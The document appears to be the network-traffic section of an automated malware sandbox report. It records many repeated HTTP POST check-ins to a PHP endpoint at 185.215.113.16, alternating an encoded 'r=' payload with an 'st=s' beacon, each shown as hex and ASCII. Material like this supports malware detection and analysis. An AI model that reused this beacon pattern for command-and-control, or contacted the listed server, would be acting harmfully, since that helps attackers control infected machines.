                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
